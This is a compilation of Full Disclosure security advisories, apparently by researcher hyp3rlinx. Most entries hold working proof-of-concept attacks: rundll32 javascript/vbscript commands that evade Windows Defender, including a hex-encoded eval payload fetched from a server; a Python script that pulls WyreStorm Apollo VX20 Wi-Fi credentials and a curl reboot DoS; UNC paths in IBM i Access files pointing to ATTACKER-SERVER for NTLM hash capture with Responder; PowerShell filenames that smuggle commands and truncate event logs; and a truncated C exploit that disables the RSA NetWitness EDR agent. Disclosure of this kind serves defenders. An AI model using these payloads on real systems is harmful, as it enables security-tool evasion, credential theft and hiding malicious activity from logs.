[FD] Microsoft Windows Defender / Backdoor:JS/Relvelshe.A / Detection Mitigation Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
https://hyp3rlinx.altervista.org/advisories/Windows_Defender_Backdoor_JS.Relvelshe.A_Detection_Mitigation_Bypass.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Windows Defender
[Vulnerability Type]
Detection Mitigation Bypass
Backdoor:JS/Relvelshe.A
[CVE Reference]
N/A
[Security Issue]
Back in 2022 I released a PoC to bypass the Backdoor:JS/Relvelshe.A
detection in defender but it no longer works as was mitigated.
However, adding a simple javascript try catch error statement and eval the
hex string it executes as of the time of this post.
[References]
https://twitter.com/hyp3rlinx/status/1480657623947091968
[Exploit/POC]
1) python -m http.server 80
2) Open command prompt as Administrator
3) rundll32
javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication
,RunHTMLApplication ";document.write();GetObject("script"+":"+"
http://localhost/yo.tmp;)
Create file and host on server, this is contents of the "yo.tmp" file.
try{
<![CDATA[
var hex =
"6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
]]>
}catch(e){
eval(str)
}
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
Vendor Notification:
February 18, 2024: Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Microsoft Windows Defender / VBScript Detection Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_VBSCRIPT_TROJAN_MITIGATION_BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Windows Defender
[Vulnerability Type]
Windows Defender VBScript Detection Mitigation Bypass
TrojanWin32Powessere.G
[CVE Reference]
N/A
[Security Issue]
Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka
"POWERLIKS" type execution that leverages rundll32.exe. Attempts at
execution fail
and attackers will typically get an "Access is denied" error message.
Previously I have disclosed 3 bypasses using rundll32 javascript, this
example leverages VBSCRIPT and ActiveX engine.
Running rundll32
vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication
"+String(CreateObject("Wscript.Shell").Run("calc.exe"),0), will typically
get blocked by Windows Defender with
an "Access is denied" message.
Trojan:Win32/Powessere.G
Category: Trojan
This program is dangerous and executes commands from an attacker.
However, you can add arbitrary text for the 2nd mshtml parameter to build
off my previous javascript based bypasses to skirt defender detection.
Example, adding "shtml", "Lol" or other text and it will execute as of the
time of this writing.
E.g.
C:\sec>rundll32
vbscript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication
"+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
[References]
https://twitter.com/hyp3rlinx/status/1759260962761150468
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt
https://lolbas-project.github.io/lolbas/Binaries/Rundll32/
[Exploit/POC]
C:\sec>rundll32
vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication
"+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
Access is denied.
C:\sec>rundll32
vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication
"+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
We win!
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
Vendor Notification:
February 18, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Microsoft Windows Defender / Trojan.Win32/Powessere.G / Detection Mitigation Bypass Part 3
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Windows Defender
[Vulnerability Type]
Windows Defender Detection Mitigation Bypass
TrojanWin32Powessere.G
[CVE Reference]
N/A
[Security Issue]
Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka
"POWERLIKS" type execution that leverages rundll32.exe. Attempts at
execution fail
and attackers will typically get an "Access is denied" error message.
Back in 2022, I first disclosed how that could be easily bypassed by
passing an extra path traversal when referencing mshtml but since has been
mitigated.
Recently Feb 7, 2024, I disclosed using multi-commas "," will bypass that
mitigation but has since been fixed again.
The fix was short lived as I find yet another third trivial bypass soon
after.
[Exploit/POC]
Open command prompt as Administrator.
C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication
";alert(13)
Access is denied.
C:\sec>rundll32.exe
javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication
";alert('HYP3RLINX')
[Video PoC URL]
https://www.youtube.com/watch?v=yn9gdJ7c7Kg
[Network Access]
Local
[Severity]
High
[References]
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
https://twitter.com/hyp3rlinx/status/1755417914599956833
https://twitter.com/hyp3rlinx/status/1758624140213264601
[Disclosure Timeline]
Vendor Notification:
February 16, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Microsoft Windows Defender / Trojan.Win32/Powessere.G / Detection Mitigation Bypass Part 2.
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Windows Defender Detection Mitigation Bypass TrojanWin32Powessere.G [CVE Reference] N/A [Security Issue] Trojan.Win32/Powessere.G / Mitigation Bypass Part 2. Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message. Back in 2022, I disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated. However, I discovered using multi-commas "," will bypass that mitigation and successfully execute as of the time of this writing. [References] https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt [Exploit/POC] Open command prompt as Administrator. C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666) Access is denied. C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666) Multi-commas, for the Win! [Network Access] Local [Severity] High [Disclosure Timeline] February 7, 2024: Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Wyrestorm Apollo VX20 / Incorrect Access Control - Credentials Disclosure / CVE-2024-25735
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.wyrestorm.com
[Product]
APOLLO VX20 < 1.3.58
[Vulnerability Type]
Incorrect Access Control (Credentials Disclosure)
[Affected Component]
Web interface, config
[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58
[CVE Reference]
CVE-2024-25735
[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58.
Remote attackers can discover cleartext credentials for the SoftAP (access
point) Router /device/config using an HTTP GET request.
The credentials are then returned in the HTTP response. curl -k
https://192.168.x.x/device/config
E.g. HTTP response snippet:
:{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"}
,"softAp":{"password":"12345678","router":"y","softAp":"y"}...
[Exploit/POC]
import requests
target="https://x.x.x.x;
res = requests.get(target+"/device/config", verify=False)
idx=res.content.find('{"password":')
if idx != -1:
idx2=res.content.find('router')
if idx2 != -1:
print("[+] CVE-2024-25735 Credentials Disclosure")
print("[+] " + res.content[idx + 1:idx2 + 11])
print("[+] hyp3rlinx")
else:
print("[!] Apollo vX20 Device not vulnerable...")
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Wyrestorm Apollo VX20 / Account Enumeration / CVE-2024-25734
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_ACCOUNT_ENUMERATION_CVE-2024-25734.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.wyrestorm.com [Product] APOLLO VX20 < 1.3.58 [Vulnerability Type] Account Enumeration [CVE Reference] CVE-2024-25734 [Security Issue] An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. The TELNET service prompts for a password only after a valid username is entered. Attackers who can reach the Apollo VX20 Telnet service can determine valid accounts, this can potentially allow for brute force attack on a valid account. [Exploit/POC] TELNET x.x.x.x 23 username:aa username:bb username:admin password: [Network Access] Remote [Affected Product Code Base] APOLLO VX20 - < 1.3.58, fixed in v1.3.58 [Severity] Medium [Disclosure Timeline] Vendor Notification: January 18, 2024 Vendor released fixed firmware v1.3.58: February 2, 2024 February 11, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Wyrestorm Apollo VX20 / Incorrect Access Control - DoS / CVE-2024-25736
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_DOS_CVE-2024-25736.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.wyrestorm.com [Product] APOLLO VX20 < 1.3.58 [Vulnerability Type] Incorrect Access Control (DOS) [Affected Product Code Base] APOLLO VX20 < 1.3.58, fixed in v1.3.58 [Affected Component] Web interface, reboot and reset commands [CVE Reference] CVE-2024-25736 [Security Issue] An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request. [Exploit/POC] curl -k https://192.168.x.x/device/reboot [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: January 18, 2024 Vendor released fixed firmware v1.3.58: February 2, 2024 February 11, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] IBM i Access Client Solutions / Remote Credential Theft / CVE-2024-22318
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.ibm.com [Product] IBM i Access Client Solutions [Versions] All [Remediation/Fixes] None [Vulnerability Type] Remote Credential Theft [CVE Reference] CVE-2024-22318 [Security Issue] IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations. Attackers can create UNC capable paths within ACS 5250 display terminal configuration ".HOD" or ".WS" files to point to a hostile server. If NTLM is enabled and the user opens an attacker supplied file the Windows operating system will try to authenticate using the current user's session. The attacker controlled server could then capture the NTLM hash information to obtain the user's credentials. [References] https://www.ibm.com/support/pages/node/7116091 [Exploit/POC] The client access .HOD File vulnerable parameters: 1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c [KeyRemapFile] 2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv The client access legacy .WS File vulnerable parameters: DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c Example, client access older .WS file [Profile] ID=WS Version=9 [Telnet5250] AssociatedPrinterStartMinimized=N AssociatedPrinterTimeout=0 SSLClientAuthentication=Y HostName=PWN AssociatedPrinterClose=N Security=CA400 CertSelection=AUTOSELECT AutoReconnect=Y [KeepAlive] KeepAliveTimeOut=0 [Keyboard] IBMDefaultKeyboard=N DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c [Communication] Link=telnet5250 [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification: December 14, 2023 Vendor Addresses Issue: February 7, 2024 February 8, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] RansomLord v2 - Anti-Ransomware Exploitation Tool / New Release
RansomLord v2 - Anti-Ransomware Exploitation Tool [Description] RansomLord is a proof-of-concept Anti-Ransomware exploitation tool that generates PE files, used to exploit vulnerable Ransomware pre-encryption. Lang: C SHA256 : 8EA83752C4096C778709C14B60B9735CC68A5971DCDB0028A0BB167550554769 This version now intercepts and terminates malware tested from 43 different threat groups. Adding Wagner, Hakbit, Paradise, Jaff, DoubleZero, Blacksnake, Darkbit, Vohuk, Medusa and Phobus. Two are wipers Wagner and DoubleZero supposedly used against entities in the Ukraine conflict. Updated the x32/x64 DLLs to exploit ten more vulnerable ransomware Added -s Security information flag section Lamer Security engines may incorrectly flag RansomLord DLLs as malicious! They are NOT! Win32 API export functions are stubs that simply call exit(1) Generated exploit DLL MD5 file hashes: x32: DFFBE7F79077E89197334764FE6882F4 x64: 5B54E12B8B944FDF64C091B0E6588E48 [Download] https://github.com/malvuln/RansomLord/releases/tag/v2 Malvuln ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Windows PowerShell Single Quote Code Execution / Event Log Bypass
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS_POWERSHELL_SINGLE_QUOTE_CODE_EXEC_EVENT_LOG_BYPASS.txt [+] twitter.com/hyp3rlinx [+] twitter.com/malvuln [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Microsoft Windows PowerShell Built on the . NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows. [Vulnerability Type] PowerShell Single Quote Code Execution / Event Log Bypass [CVE Reference] N/A [Security Issue] In past times I disclosed how PowerShell executes unintended files or BASE64 code when processing specially crafted filenames. This research builds on my "PSTrojanFile" work, adding a PS command line single quote bypass and PS event logging failure. On Windows CL tab completing a filename uses double quotes that can be leveraged to trigger arbitrary code execution. However, if the filename gets wrapped in single quotes it failed, that is until now. [Single Quote Code Exec Bypass] Combining both the semicolon ";" and ampersand "&" characters, I found it bypasses the single quote limitation given a malicious filename. The trailing semicolon ";" delimits the .XML extension and helps trigger the PE file specified in the case DOOM.exe and the PS event log gets truncated. Take the following three test cases using Defender API which takes a specially crafted filename. C:\>powershell Set-ProcessMitigation -PolicyFilePath "Test;saps DOOM;.xml" 1) Double quotes OK "Test;saps DOOM;.xml" 2) Single quotes FAILS 'Test;saps DOOM;.xml' 3) Single quotes BYPASS 'Test.xml' PowerShell API calls that prefix the "powershell" cmd is a requirement and may affect many built-in PS API or module commands. C:\Users\gg\Downloads\>powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected.zip' Malware.exe lives in Downloads dir, notice how we only need a partial name as part of the .ZIP archive filename we are scanning here and that it also excludes the .EXE portion in that filename. [PS Event Log Bypass] On Windows PowerShell event logging can be enabled to alert a SOC on suspicious activity and or for incident response forensic artifact purposes. However, when bypassing PS single quotes, I noticed an interesting side effect. The ampersand "&" character seems to truncate the PS event log. Example, processing 'Infected.zip' the Event ID 403 logs 'infected' and not the true name of 'Malware.exe' which was actually executed. Want to mask the true name of the file from PowerShell Event logging? (Malware.exe lives in the same directory) C:\>powershell Get-Filehash 'Infected.zip' -algorithm MD5 Below the event log HostApplication contains 'infected' and not the true name of Malware.exe that was actually executed due to truncating. [PS Log ID 403 Snippet] Engine state is changed from Available to Stopped. Details: NewEngineState=Stopped PreviousEngineState=Available SequenceNumber=25 HostName=ConsoleHost HostVersion=5.1.19041.1682 HostId=fecdc355-0e89-4d4c-a31d-7835cafa44f0 HostApplication=powershell get-filehash 'Infected EngineVersion=5.1.19041.1682 [Exploit/POC] powershell Get-Filehash 'Infected.zip' -algorithm MD5 Run some malware plus bypass logging of true file name: C:\Users\gg\Downloads>powershell get-filehash 'Infected.zip' -algorithm md5 PE file Malware.exe in the Downloads directory, notice the .zip we are scanning doesn't include .exe in the filename. Defender Anti-Malware API: powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected.zip' Call ping cmd using double "&": C:\>powershell Get-Filehash 'powerfail 8.8.8.8&.txt' -algorithm md5 Call a Windows cmd to Logoff the victim: C:\>powershell Start-MpScan -Scanpath 'virus' We have options: A) to call commands use double "&" --> 'virus' B) bypass PS event logging of the true file name and execute code use "&" with ";" --> 'Infected.zip' [References] https://github.com/hyp3rlinx/PSTrojanFile https://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: circa 2019 December 27, 2023 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for i
[FD] Microsoft Defender Anti-Malware PowerShell API - Arbitrary Code Execution
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt [+] twitter.com/hyp3rlinx [+] x.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows PowerShell [Vulnerability Type] Arbitrary Code Execution [CVE Reference] N/A [Security Issue] Microsoft Defender Anti Malware and or PS API's can result in executing arbitrary code. E.g. scan a directory, shortcut .lnk or even non-existent item, may execute unintended code. This vector builds upon my previous advisory and subsequent project PSTrojanFile. Requirements: 1) On CL 'powershell' cmd is prefixed or passed in by calling PowerShell from another script 2) Executable file of same name as the parameter that lives nearby Examples: powershell Start-MpScan -Scanpath "C:\Users\gg\Downloads\;saps Helper;.1.zip" (Helper.exe lives on Desktop) Create directory ";saps Test", Test.exe, Test.cmd etc is on same CL path powershell Add-MpPreference -ControlledFolderAccessAllowedApplications ";saps Test" Create directory with semicolon, drop PE file named doom.exe in same path. powershell Set-ProcessMitigation -PolicyFilePath "test;saps doom" TODO: Update PSTrojanFile [References] http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt https://github.com/hyp3rlinx/PSTrojanFile https://www.exploit-db.com/exploits/47248 https://github.com/MicrosoftDocs/windows-powershell-docs/tree/main/docset/winserver2019-ps/defender [Video PoC URL] https://www.youtube.com/watch?v=0Go6yJiRWP8 [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: circa (2019) December 7, 2023 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Windows PowerShell / Trojan File RCE revisited
Hi, Windows PowerShell Filename Code Execution POC Discovery: 2019 and revisited 2023 Since it still works, I dusted off and made minor improvements: Execute a remote DLL using rundll32 Execute an unintended secondary PS1 script or local text-file (can be hidden) Updated the PS1 Trojan Filename Creator Python3 Script First reported to Microsoft back in 2019 yet remains unfixed as of the time of this writing. Remote code execution via a specially crafted filename. https://github.com/hyp3rlinx/PSTrojanFile Thank you, hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] RSA NetWitness EDR Agent / Incorrect Access Control - Code Execution / CVE-2022-47529
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] RSA Securitywww.netwitness.com [Product] NetWitness Endpoint EDR Agent The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints—on and off the network—providing deep visibility into their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly detecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response. [Vulnerability Type] Incorrect Access Control / Code Execution [CVE Reference] CVE-2022-47529 [Security Issue] CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending the events to SIEM or make the agent run user-supplied commands. Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local and admin Windows user accounts to modify the endpoint agent service configuration: to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification. Interestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC months before finding and report. SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d LANDeskService.exe [Severity] Critical [Impact(s)] Denial-of-Service Arbitrary Code Execution [Attack Vector] To exploit, open handle to memory objects held by the endpoint agent, modify the ACL for the ones that have insecure ACLs, and DENY access to Everyone group [Affected Product Code Base] All versions prior to v12.2 [Network Access] Local [References]https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935 [Vuln Code Block]: 0001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:0001400F7B10 ; sub_14013BA50+19?p .text:0001400F7B10 ; DATA XREF: ... .text:0001400F7B10 pushrbx .text:0001400F7B12 sub rsp, 20h .text:0001400F7B16 mov rbx, rcx .text:0001400F7B19 testrcx, rcx .text:0001400F7B1C jz short loc_1400F7B5C .text:0001400F7B1E callcs:InitializeCriticalSection .text:0001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection .text:0001400F7B28 callcs:InitializeCriticalSection .text:0001400F7B2E mov edx, 1 ; bManualReset .text:0001400F7B33 xor r9d, r9d; lpName .text:0001400F7B36 mov r8d, edx; bInitialState .text:0001400F7B39 xor ecx, ecx; lpEventAttributes .text:0001400F7B3B callcs:CreateEventW .text:0001400F7B41 mov [rbx+50h], rax .text:0001400F7B45 mov dword ptr [rbx+58h], 0 .text:0001400F7B4C testrax, rax .text:0001400F7B4F jz short loc_1400F7B5C [Exploit/POC] "RSA_NetWitness_Exploit.c" #include "windows.h" #include "stdio.h" #include "accctrl.h" #include "aclapi.h" #define OPEN_ALL_ACCESS 0x1F0003 /* RSA NetWitness EDR Endpoint Agent Tamper Protection Bypass / EoP Code Execution RSA NetWitness.msi --> NWEAgent.exe MD5: c0aa7e52cbf7799161bac9ebefa38d49 Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent. Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user. By John Page (hyp3rlinx) - Nov 2022 DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse. Users of this supplied PoC code accept all risks, do no harm. X64 PE file vuln code block: 0001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:0001400F7B10 ; sub_14013BA50+19?p .text:0001400F7B10 ; DATA XREF: ... .text:0001400F7B10 pushrbx .text:0001400F7B12 sub rsp, 20h .text:0001400F7B16 mov rbx, rcx .text:0001400F7B19 testrcx, rcx .text:0001400F7B1C jz short loc_1400F7B5C .text:0001400F7B1E callcs:InitializeCriticalSection .text:0
[FD] RSA NetWitness Platform EDR / Incorrect Access Control - Code Execution
